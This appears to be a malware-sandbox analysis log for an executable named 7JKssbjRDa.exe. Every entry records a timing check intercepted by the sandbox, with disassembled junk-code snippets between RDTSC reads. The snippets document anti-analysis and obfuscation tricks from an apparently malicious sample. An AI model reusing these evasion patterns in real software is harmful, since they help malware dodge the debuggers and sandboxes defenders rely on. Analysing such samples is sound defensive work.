Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1F93A second address: A1F95B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B52h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1F95B second address: A1F961 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CDFB3 second address: 9CDFB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CDFB9 second address: 9CE066 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F68C0B5CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F68C0B5CAE8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 cld 0x00000028 jmp 00007F68C0B5CAF6h 0x0000002d mov ebx, dword ptr [ebp+124840A1h] 0x00000033 jmp 00007F68C0B5CAECh 0x00000038 add eax, ebx 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F68C0B5CAE8h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000016h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 jmp 00007F68C0B5CAF5h 0x00000059 mov dx, cx 0x0000005c mov ecx, 503073DAh 0x00000061 push eax 0x00000062 push edi 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F68C0B5CAF5h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1FA92 second address: A1FA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1FA96 second address: A1FA9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1FA9C second address: A1FAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1FAA6 second address: A1FAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1FAAA second address: A1FAAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1FAAE second address: A1FAC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F68C0B5CAF7h 0x0000000e jmp 00007F68C0B5CAEBh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A1FC31 second address: A1FC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F68C0520B46h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F68C0520B50h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A22026 second address: A2202B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A2202B second address: A2203C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B4Ch 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A250C5 second address: A250CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A250CE second address: A250FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jns 00007F68C0520B46h 0x0000000c jmp 00007F68C0520B4Fh 0x00000011 popad 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F68C0520B4Eh 0x0000001b jng 00007F68C0520B46h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A250FB second address: A2510B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F68C0B5CAE6h 0x0000000a jng 00007F68C0B5CAE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A2510B second address: A25141 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B53h 0x00000007 jmp 00007F68C0520B56h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jc 00007F68C0520B46h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A24848 second address: A2484E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A24B52 second address: A24B58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A24B58 second address: A24B5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A2DAF2 second address: A2DB42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68C0520B55h 0x00000009 jmp 00007F68C0520B4Eh 0x0000000e popad 0x0000000f jmp 00007F68C0520B59h 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F68C0520B4Ch 0x0000001c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A2CBF8 second address: A2CC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A2CC03 second address: A2CC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A2CC09 second address: A2CC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A2CE9D second address: A2CEB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68C0520B52h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A2CEB3 second address: A2CEBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A2CEBB second address: A2CEBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A3121A second address: A31227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A31380 second address: A31384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A31384 second address: A31399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A3CAF5 second address: A3CAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A3CAFB second address: A3CAFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A3CAFF second address: A3CB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F68C0520B50h 0x0000000c jp 00007F68C0520B46h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A3CB1D second address: A3CB67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F68C0B5CAEBh 0x00000008 jmp 00007F68C0B5CAF8h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jng 00007F68C0B5CB0Eh 0x0000001a ja 00007F68C0B5CAEEh 0x00000020 pushad 0x00000021 jl 00007F68C0B5CAE6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A3D345 second address: A3D352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F68C0520B46h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A3D352 second address: A3D356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A3D356 second address: A3D35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A3D35E second address: A3D363 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A3D363 second address: A3D385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68C0520B4Bh 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007F68C0520B4Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A3DADD second address: A3DAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A3DAE1 second address: A3DAFA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F68C0520B4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F68C0520B46h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A414FE second address: A41515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 jmp 00007F68C0B5CAEDh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A41515 second address: A4151B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A456E4 second address: A456EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A48CC4 second address: A48CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A48CCE second address: A48CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A489D2 second address: A489D7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A489D7 second address: A489E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A489E0 second address: A489EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F68C0520B46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A489EA second address: A48A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F68C0B5CAF3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 je 00007F68C0B5CAE6h 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A56DF2 second address: A56DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A56DFB second address: A56E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A59C75 second address: A59C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A59C79 second address: A59C89 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F68C0B5CAE6h 0x00000008 jne 00007F68C0B5CAE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A59854 second address: A5985A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A5985A second address: A59862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A59862 second address: A59866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A5C716 second address: A5C72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F68C0B5CAE6h 0x0000000a popad 0x0000000b jmp 00007F68C0B5CAEBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A61727 second address: A6173E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68C0520B4Fh 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A6173E second address: A6174C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop esi 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A6174C second address: A61752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A65C58 second address: A65C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A6E145 second address: A6E14F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F68C0520B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A6E14F second address: A6E168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F68C0B5CAEBh 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A6DFB0 second address: A6DFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A6DFB6 second address: A6DFBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A6DFBD second address: A6DFE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007F68C0520B5Ah 0x0000000f jmp 00007F68C0520B52h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A6DFE3 second address: A6DFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F68C0B5CAE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A73EF8 second address: A73F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68C0520B51h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A785CE second address: A785D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A785D4 second address: A785D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A78A1C second address: A78A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A78A25 second address: A78A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A78BC5 second address: A78BC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A78E50 second address: A78E56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A78FC1 second address: A78FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jp 00007F68C0B5CAE6h 0x0000000c jmp 00007F68C0B5CAF0h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A80556 second address: A80560 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F68C0520B4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A80560 second address: A8058E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F68C0B5CAF8h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 jnl 00007F68C0B5CAE8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A8058E second address: A80593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A8C450 second address: A8C454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A8C454 second address: A8C45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A8C45A second address: A8C460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A8E90C second address: A8E914 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A9C83E second address: A9C869 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F68C0B5CAE8h 0x0000000c popad 0x0000000d push edx 0x0000000e jno 00007F68C0B5CAF2h 0x00000014 pushad 0x00000015 js 00007F68C0B5CAE6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A9C381 second address: A9C387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: A9C55E second address: A9C562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: AA3B2C second address: AA3B84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F68C0520B65h 0x0000000f popad 0x00000010 push esi 0x00000011 jmp 00007F68C0520B54h 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007F68C0520B46h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: AA3E7D second address: AA3E83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: AA3E83 second address: AA3E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: AA3E87 second address: AA3E98 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F68C0B5CAE6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: AA4171 second address: AA4188 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F68C0520B4Ch 0x00000008 pushad 0x00000009 jl 00007F68C0520B46h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: AA6352 second address: AA6367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68C0B5CAF0h 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: AA6367 second address: AA636C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
